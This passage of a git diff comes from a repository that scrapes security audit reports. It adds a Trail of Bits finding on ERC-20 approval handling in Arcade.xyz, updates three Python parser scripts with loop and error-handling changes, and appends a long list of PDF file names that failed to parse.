to enforce that parameter. 26 Maple Labs Long term, always allow the caller to control the amount of a transfer. This is especially important for transfer amounts that depend on factors that can change between transactions. Enable the caller to add a lower limit for a transfer from a contract and an upper limit for a transfer of the callers funds to a contract. 27 Maple Labs A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] + }, + { + "title": "3. callApprove does not follow approval best practices ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-07-arcade-securityreview.pdf", + "body": "The AssetVault.callApprove function has undocumented behaviors and lacks the increase/decrease approval functions, which might impede third-party integrations. A well-known race condition exists in the ERC-20 approval mechanism. The race condition is enabled if a user or smart contract calls approve a second time on a spender that has already been allowed. If the spender sees the transaction containing the call before it has been mined, they can call transferFrom to transfer the previous value and then still receive authorization to transfer the new value. To mitigate this, AssetVault uses the SafeERC20.safeApprove function, which will revert if the allowance is updated from nonzero to nonzero. However, this behavior is not documented, and it might break the protocols integration with third-party contracts or o-chain components. 282 283 284 285 286 287 288 289 290 291 292 293 294 295 37 38 39 40 41 42 function callApprove( address token, address spender, uint256 amount ) external override onlyAllowedCallers onlyWithdrawDisabled nonReentrant { if (!CallWhitelistApprovals(whitelist).isApproved(token, spender)) { revert AV_NonWhitelistedApproval(token, spender); } // Do approval IERC20(token).safeApprove(spender, amount); emit Approve(msg.sender, token, spender, amount); } Figure 3.1: The callApprove function in arcade-protocol/contracts/vault/AssetVault.sol /** * @dev Deprecated. This function has issues similar to the ones found in * {IERC20-approve}, and its usage is discouraged. * * Whenever possible, use {safeIncreaseAllowance} and * {safeDecreaseAllowance} instead. 26 Arcade.xyz V3 Security Assessment */ function safeApprove( IERC20 token, address spender, uint256 value ) internal { 43 44 45 46 47 48 49 50 51 52 53 54 55 56 spender, value)); 57 } // safeApprove should only be called when setting an initial allowance, // or when resetting it to zero. To increase and decrease it, use // 'safeIncreaseAllowance' and 'safeDecreaseAllowance' require( (value == 0) || (token.allowance(address(this), spender) == 0), \"SafeERC20: approve from non-zero to non-zero allowance\" ); _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, Figure 3.2: The safeApprove function in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol An alternative way to mitigate the ERC-20 race condition is to use the increaseAllowance and decreaseAllowance functions to safely update allowances. These functions are widely used by the ecosystem and allow users to update approvals with less ambiguity. uint256 newAllowance = token.allowance(address(this), spender) + value; _callOptionalReturn(token, abi.encodeWithSelector(token.approve.selector, } ) internal { function safeIncreaseAllowance( function safeDecreaseAllowance( IERC20 token, address spender, uint256 value 59 60 61 62 63 64 65 spender, newAllowance)); 66 67 68 69 70 71 72 73 74 75 zero\"); 76 77 abi.encodeWithSelector(token.approve.selector, spender, newAllowance)); 78 79 uint256 newAllowance = oldAllowance - value; _callOptionalReturn(token, IERC20 token, address spender, uint256 value ) internal { unchecked { } } uint256 oldAllowance = token.allowance(address(this), spender); require(oldAllowance >= value, \"SafeERC20: decreased allowance below Figure 3.3: The safeIncreaseAllowance and safeDecreaseAllowance functions in openzeppelin-contracts/contracts/token/ERC20/utils/SafeERC20.sol 27 Arcade.xyz V3 Security Assessment Exploit Scenario Alice, the owner of an asset vault, sets up an approval of 1,000 for her external contract by calling callApprove. She later decides to update the approval amount to 1,500 and again calls callApprove. This second call reverts, which she did not expect. Recommendations Short term, take one of the following actions: Update the documentation to make it clear to users and other integrating smart contract developers that two transactions are needed to update allowances. Add two new functions in the AssetVault contract: callIncreaseAllowance and callDecreaseAllowance, which internally call SafeERC20.safeIncreaseAllowance and SafeERC20.safeDecreaseAllowance, respectively. Long term, when using external libraries/contracts, always ensure that they are being used correctly and that edge cases are explained in the documentation. 28 Arcade.xyz V3 Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] } ] \ No newline at end of file diff --git a/scrapers/dedaub_parser.py b/scrapers/dedaub_parser.py index 4d03626..196c638 100644 --- a/scrapers/dedaub_parser.py +++ b/scrapers/dedaub_parser.py @@ -196,15 +196,18 @@ def jsonify_findings(json_name): if __name__ == "__main__": # Step 1: Extract findings text from PDFs - # for contents in os.walk("../pdfs/dedaub-audits"): - # if contents[1]: - # for subdir in contents[1]: - # pdf_path = contents[0] + "/" + subdir - # for pdf_file in os.listdir(pdf_path): - # # Skip Ethereum Foundation directory, those are impact studies not audits - # # Skip DeFi Saver and Mushroom Finance directory, they have very different report structures - # if pdf_path.find("Ethereum Foundation") < 0 and pdf_path.find("DeFi Saver") < 0 and pdf_path.find("Mushrooms Finance") < 0: - # extract_finding(subdir + "/" + pdf_file) + for contents in os.walk("../pdfs/dedaub-audits"): + if contents[1]: + for subdir in contents[1]: + pdf_path = contents[0] + "/" + subdir + for pdf_file in os.listdir(pdf_path): + # Skip Ethereum Foundation directory, those are impact studies not audits + # Skip DeFi Saver and Mushroom Finance directory, they have very different report structures + if pdf_path.find("Ethereum Foundation") < 0 and pdf_path.find("DeFi Saver") < 0 and pdf_path.find("Mushrooms Finance") < 0: + try: + extract_finding(subdir + "/" + pdf_file) + except: + print("Error parsing " + pdf_file) # Step 2: Parse findings text into JSON for json_file in os.listdir("../findings_newupdate/dedaub"): @@ -212,16 +215,16 @@ def jsonify_findings(json_name): # Step 3: deduplicate findings # only keep unique findings, the file contains an array of findings - # with open("../results/dedaub_findings.json", "r") as f: - # findings = json.load(f) + with open("../results/dedaub_findings.json", "r") as f: + findings = json.load(f) - # unique_findings = [] - # for finding in findings: - # if finding not in unique_findings: - # unique_findings.append(finding) + unique_findings = [] + for finding in findings: + if finding not in unique_findings: + unique_findings.append(finding) # Step 4: write only unique findings to final json - # with open("../results/dedaub_findings.json", "w") as f: - # json.dump(unique_findings, f, indent=4) + with open("../results/dedaub_findings.json", "w") as f: + json.dump(unique_findings, f, indent=4) \ No newline at end of file diff --git a/scrapers/errors.txt b/scrapers/errors.txt index 9fee62c..9aeb7ee 100644 --- a/scrapers/errors.txt +++ b/scrapers/errors.txt @@ -5,3 +5,426 @@ SeaportProtocol.pdf UniswapMobileWallet-securityreview.pdf MesonProtocol.pdf 2022-10-shimacapital-ondo-securityreview.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +Enzyme/Enzyme Audit.pdf +LiquidCollectivePR-Spearbit-Security-Review-July.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +celo_bugfixes.md +parity.pdf +renvm.pdf +UniswapV3Core.pdf +PerpetualProtocolV2.pdf +argo-securityreview.pdf +ZcashWP.pdf +AlephBFT.pdf +2022-12-curl-threatmodel.pdf +SpruceID.pdf +OriginDollar.pdf +origin.pdf +aztec.pdf +Liquity.pdf +2022-12-openarchivesaveandroid-securityreview.pdf +basis.pdf +argo-threatmodel.pdf +zecwallet.pdf +ampleforth.pdf +Mobilecoin.pdf +CloudEvents.pdf +2023-02-chainport-fixreview.pdf +MobilecoinFog.pdf +MagmaWallet.pdf +chai-loa.pdf +LinuxKernelReleaseSigning.pdf +FraxFinance.pdf +ParallelFinance2FixReview.pdf +DFINITYThresholdECDSAandBtcCanistersFixReview.pdf +0x-protocol.pdf +gemini-dollar.pdf +Opyn.pdf +hermez.pdf +livepeer.pdf +compound-governance.pdf +2023-04-mysoloans-securityreview.pdf +YearnV2Vaults.pdf +dtoken.pdf +LiquityProxyContracts.pdf +Linkerd-fixreview.pdf +2021-04-balancer-balancerv2-securityreview.pdf +AnteProtocolFixReview.pdf +compound-2.pdf +SeaportProtocol.pdf +zcoin-lelantus-summary.pdf +CREAMSummary.pdf +numerai.pdf +2022-10-shimacapital-ondo-fixreview.pdf +CasperLedger.pdf +2022-12-paxos-paypal-pyusd-securityreview.pdf +compound-3.pdf +CurveDAO.pdf +2023-04-ajnalabs-securityreview.pdf +CompliFi.pdf +curve-summary.pdf +Hey.pdf +MobileCoinBFT.pdf +mc-dai.pdf +YieldProtocol.pdf +UniswapMobileWallet-fixreview.pdf +Opyn-Gamma-Protocol.pdf +WorkLock-Summary.pdf +StandardNotes.pdf +DFINITYConsensus.pdf +2022-10-GSquared-fixreview.pdf +arweave-randomx.pdf +dodo.pdf +NervosSUDT.pdf +2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf +nucypher-2.pdf +AdvancedBlockchainQ42021.pdf +rook.pdf +UniswapMobileWallet-securityreview.pdf +DFINITY.pdf +amp.pdf +golem.pdf +RSKj.pdf +BeethovenXSummary.pdf +Symbol.pdf +pantheon.pdf +2022-09-incrementprotocol-fixreview.pdf +voatz-threatmodel.pdf +Flexa.pdf +setprotocol.pdf +AcalaNetwork.pdf +wALGO.pdf +Zcash.pdf +hegic-summary.pdf +LedgerFilecoin.pdf +AdvancedBlockchain.pdf +MesonProtocol.pdf +Helm.pdf +ETH2DepositCLI.pdf +2022-07-beanstalk-fixreview.pdf +2022-10-openarchivesaveios-securityreview.pdf +88mph.pdf +2023-03-primitive-securityreview.pdf +2022-10-shimacapital-ondo-securityreview.pdf +thesis-summary.pdf +voatz-securityreview.pdf +sai.pdf +dexter.pdf +dapphub.pdf +paxos.pdf +2023-06-thesistsslib-securityreview.pdf +dharma-smartwallet.pdf +EIP-1283.pdf +MesonProtocolDesignReview.pdf +SecureDropWorkstation.pdf +CasperLabsHighwayProtocol.pdf +ZeroTierProtocol.pdf +2023-07-dappos-securityreview.pdf +LiquityProtocolandStabilityPoolFinalReport.pdf +BalancerCore.pdf +Zcash2.pdf +sandiskx600.pdf +2023-03-eleutherai-huggingface-safetensors-securityreview.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +celo_bugfixes.md +parity.pdf +renvm.pdf +UniswapV3Core.pdf +PerpetualProtocolV2.pdf +argo-securityreview.pdf +ZcashWP.pdf +AlephBFT.pdf +2022-12-curl-threatmodel.pdf +SpruceID.pdf +OriginDollar.pdf +origin.pdf +aztec.pdf +Liquity.pdf +2022-12-openarchivesaveandroid-securityreview.pdf +basis.pdf +argo-threatmodel.pdf +zecwallet.pdf +ampleforth.pdf +Mobilecoin.pdf +CloudEvents.pdf +2023-02-chainport-fixreview.pdf +MobilecoinFog.pdf +MagmaWallet.pdf +chai-loa.pdf +LinuxKernelReleaseSigning.pdf +FraxFinance.pdf +ParallelFinance2FixReview.pdf +DFINITYThresholdECDSAandBtcCanistersFixReview.pdf +0x-protocol.pdf +gemini-dollar.pdf +Opyn.pdf +hermez.pdf +livepeer.pdf +compound-governance.pdf +2023-04-mysoloans-securityreview.pdf +YearnV2Vaults.pdf +dtoken.pdf +LiquityProxyContracts.pdf +Linkerd-fixreview.pdf +2021-04-balancer-balancerv2-securityreview.pdf +AnteProtocolFixReview.pdf +compound-2.pdf +SeaportProtocol.pdf +zcoin-lelantus-summary.pdf +CREAMSummary.pdf +numerai.pdf +2022-10-shimacapital-ondo-fixreview.pdf +CasperLedger.pdf +2022-12-paxos-paypal-pyusd-securityreview.pdf +compound-3.pdf +CurveDAO.pdf +2023-04-ajnalabs-securityreview.pdf +CompliFi.pdf +curve-summary.pdf +Hey.pdf +MobileCoinBFT.pdf +mc-dai.pdf +YieldProtocol.pdf +UniswapMobileWallet-fixreview.pdf +Opyn-Gamma-Protocol.pdf +WorkLock-Summary.pdf +StandardNotes.pdf +DFINITYConsensus.pdf +2022-10-GSquared-fixreview.pdf +arweave-randomx.pdf +dodo.pdf +NervosSUDT.pdf +2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf +nucypher-2.pdf +AdvancedBlockchainQ42021.pdf +rook.pdf +UniswapMobileWallet-securityreview.pdf +DFINITY.pdf +amp.pdf +golem.pdf +RSKj.pdf +BeethovenXSummary.pdf +Symbol.pdf +pantheon.pdf +2022-09-incrementprotocol-fixreview.pdf +voatz-threatmodel.pdf +Flexa.pdf +setprotocol.pdf +AcalaNetwork.pdf +wALGO.pdf +Zcash.pdf +hegic-summary.pdf +LedgerFilecoin.pdf +AdvancedBlockchain.pdf +MesonProtocol.pdf +Helm.pdf +ETH2DepositCLI.pdf +2022-07-beanstalk-fixreview.pdf +2022-10-openarchivesaveios-securityreview.pdf +88mph.pdf +2023-03-primitive-securityreview.pdf +2022-10-shimacapital-ondo-securityreview.pdf +thesis-summary.pdf +voatz-securityreview.pdf +sai.pdf +dexter.pdf +dapphub.pdf +paxos.pdf +2023-06-thesistsslib-securityreview.pdf +dharma-smartwallet.pdf +EIP-1283.pdf +MesonProtocolDesignReview.pdf +SecureDropWorkstation.pdf +CasperLabsHighwayProtocol.pdf +ZeroTierProtocol.pdf +2023-07-dappos-securityreview.pdf +LiquityProtocolandStabilityPoolFinalReport.pdf +BalancerCore.pdf +Zcash2.pdf +sandiskx600.pdf +2023-03-eleutherai-huggingface-safetensors-securityreview.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +2022-09-subspacenetwork-subspacenetworkdesktopfarmer-fixreview.pdf +aaveprotocol.pdf +Reserve_LOA.pdf +Tezori.pdf +DFINITYCanisterSandboxFixReview.pdf +TokenCard.pdf +zlib.pdf +OPAGatekeeper.pdf +computable.pdf +2023-08-digitalocean-oidc-securityreview.pdf +qtum_loa.pdf +nucypher.pdf +etcd.pdf +SweetB.pdf +wXTZ.pdf +celo_bugfixes.md +parity.pdf +renvm.pdf +UniswapV3Core.pdf +PerpetualProtocolV2.pdf +argo-securityreview.pdf +ZcashWP.pdf +AlephBFT.pdf +2022-12-curl-threatmodel.pdf +SpruceID.pdf +OriginDollar.pdf +origin.pdf +aztec.pdf +Liquity.pdf +2022-12-openarchivesaveandroid-securityreview.pdf +basis.pdf +argo-threatmodel.pdf +zecwallet.pdf +ampleforth.pdf +Mobilecoin.pdf +CloudEvents.pdf +2023-02-chainport-fixreview.pdf +MobilecoinFog.pdf +MagmaWallet.pdf +chai-loa.pdf +LinuxKernelReleaseSigning.pdf +FraxFinance.pdf +ParallelFinance2FixReview.pdf +DFINITYThresholdECDSAandBtcCanistersFixReview.pdf +0x-protocol.pdf +gemini-dollar.pdf +Opyn.pdf +hermez.pdf +livepeer.pdf +compound-governance.pdf +2023-04-mysoloans-securityreview.pdf +YearnV2Vaults.pdf +dtoken.pdf +LiquityProxyContracts.pdf +Linkerd-fixreview.pdf +2021-04-balancer-balancerv2-securityreview.pdf +AnteProtocolFixReview.pdf +compound-2.pdf +SeaportProtocol.pdf +zcoin-lelantus-summary.pdf +CREAMSummary.pdf +numerai.pdf +2022-10-shimacapital-ondo-fixreview.pdf +CasperLedger.pdf +2022-12-paxos-paypal-pyusd-securityreview.pdf +compound-3.pdf +CurveDAO.pdf +2023-04-ajnalabs-securityreview.pdf +CompliFi.pdf +curve-summary.pdf +Hey.pdf +MobileCoinBFT.pdf +mc-dai.pdf +YieldProtocol.pdf +UniswapMobileWallet-fixreview.pdf +Opyn-Gamma-Protocol.pdf +WorkLock-Summary.pdf +StandardNotes.pdf +DFINITYConsensus.pdf +2022-10-GSquared-fixreview.pdf +arweave-randomx.pdf +dodo.pdf +NervosSUDT.pdf +2022-10-balancerlabs-managedpoolsmartcontracts-securityreview.pdf +nucypher-2.pdf +AdvancedBlockchainQ42021.pdf +rook.pdf +UniswapMobileWallet-securityreview.pdf +DFINITY.pdf +amp.pdf +golem.pdf +RSKj.pdf +BeethovenXSummary.pdf +Symbol.pdf +pantheon.pdf +2022-09-incrementprotocol-fixreview.pdf +voatz-threatmodel.pdf +Flexa.pdf +setprotocol.pdf +AcalaNetwork.pdf +wALGO.pdf +Zcash.pdf +hegic-summary.pdf +LedgerFilecoin.pdf +AdvancedBlockchain.pdf +MesonProtocol.pdf +Helm.pdf +ETH2DepositCLI.pdf +2022-07-beanstalk-fixreview.pdf +2022-10-openarchivesaveios-securityreview.pdf +88mph.pdf +2023-03-primitive-securityreview.pdf +2022-10-shimacapital-ondo-securityreview.pdf +thesis-summary.pdf +voatz-securityreview.pdf +sai.pdf +dexter.pdf +dapphub.pdf +paxos.pdf +2023-06-thesistsslib-securityreview.pdf +dharma-smartwallet.pdf +EIP-1283.pdf +MesonProtocolDesignReview.pdf +SecureDropWorkstation.pdf +CasperLabsHighwayProtocol.pdf +ZeroTierProtocol.pdf +2023-07-dappos-securityreview.pdf +LiquityProtocolandStabilityPoolFinalReport.pdf +BalancerCore.pdf +Zcash2.pdf +sandiskx600.pdf +2023-03-eleutherai-huggingface-safetensors-securityreview.pdf diff --git a/scrapers/spearbit_parser.py b/scrapers/spearbit_parser.py index 66a370e..67b6738 100644 --- a/scrapers/spearbit_parser.py +++ b/scrapers/spearbit_parser.py @@ -181,13 +181,18 @@ def jsonify_findings(pdf_name): if __name__ == "__main__": # Step 1: Extract findings text from PDFs - # for pdf_file in os.listdir("../pdfs/spearbit-reports/pdfs"): - # extract_finding(pdf_file) + for pdf_file in os.listdir("../pdfs/spearbit-reports/pdfs"): + try: + extract_finding(pdf_file) + except: + print("ERROR extracting on " + pdf_file) # Step 2: Parse findings text into JSON for json_file in os.listdir("../pdfs/spearbit-reports/pdfs"): - jsonify_findings(json_file) - + try: + jsonify_findings(json_file) + except: + print("ERROR parsing on " + json_file) # Step 3: deduplicate findings # only keep unique findings, the file contains an array of findings with open("../results/spearbit_findings.json", "r") as f: diff --git a/scrapers/tob_parser.py b/scrapers/tob_parser.py index 29b67fd..552d31a 100644 --- a/scrapers/tob_parser.py +++ b/scrapers/tob_parser.py @@ -6,7 +6,13 @@ def extract_finding(pdf_name): - text = extract_text("../pdfs/" + pdf_name) + + try: + text = extract_text("../pdfs/publications/reviews/" + pdf_name) + except: + with open("errors.txt", "a") as f: + f.write(pdf_name + "\n") + return first_selection = text[text.find("Detailed Findings"):text.find("Summary of Recommendations")] @@ -65,7 +71,7 @@ def extract_finding(pdf_name): return # Save the findings to a file - with open(f"../findings_newupdate/{pdf_name[:-4]}.txt", "w") as f: + with open(f"../findings_newupdate/tob/{pdf_name[:-4]}.txt", "w") as f: for elem in ordered_findings: if elem == "": continue @@ -74,7 +80,7 @@ def extract_finding(pdf_name): def jsonify_findings(pdf_name): try: - with open(f"../findings_newupdate/{pdf_name[:-4]}.txt", "r") as f: + with open(f"../findings_newupdate/tob/{pdf_name[:-4]}.txt", "r") as f: findings = f.read().splitlines() except FileNotFoundError: return @@ -158,10 +164,13 @@ def jsonify_findings(pdf_name): if __name__ == "__main__": - # for pdf_file in os.listdir("../pdfs"): - # extract_finding(pdf_file) + for pdf_file in os.listdir("../pdfs/publications/reviews"): + try: + extract_finding(pdf_file) + except: + print("SOME ISSUE WITH " + pdf_file) - for json_file in os.listdir("../pdfs"): + for json_file in os.listdir("../pdfs/publications/reviews"): jsonify_findings(json_file) # only keep unique findings, the file contains an array of findings